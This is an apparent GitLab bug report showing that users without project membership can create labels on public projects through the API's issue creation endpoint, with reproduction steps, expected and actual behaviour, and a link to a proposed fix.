Non-members can create labels through API's Issuable creation end-points
Summary
It appears that users who can read a project are allowed to create labels on it through either of the API's issuable creation end-points (quite possibly update as well).
I encountered this bug while working on !6701 (closed)
Steps to reproduce
- Authenticate with API using any user's private token (one without access to target public project).
- Attempt to read issues on a public project (/project/:id/issues) - this works as expected.
- Create an issue, and specify labels as a comma-separated list.
- API response contains a new issue without labels.
- However, checking the labels list for the public project now shows new labels specified in the POST.
I've replicated this on gitlab.com, and on the latest master
branch.
https://gitlab.com/harigopal/geektrust-lengaburu/labels
I created those labels by calling the Issue endpoint from a new account that doesn't have any special access to the repo.
Related issue: harigopal/geektrust-lengaburu#1
The labels didn't get assigned to the issue, but they were created nonetheless. I think it'll be possible to spam any number of labels into a project this way.
Expected behavior
The labels suggested by the non-member should not be created.
Actual behavior
The labels are created.
Possible fixes
https://gitlab.com/harigopal/gitlab-ce/commits/labels-api-bug
I've included a spec for the bug and a possible fix.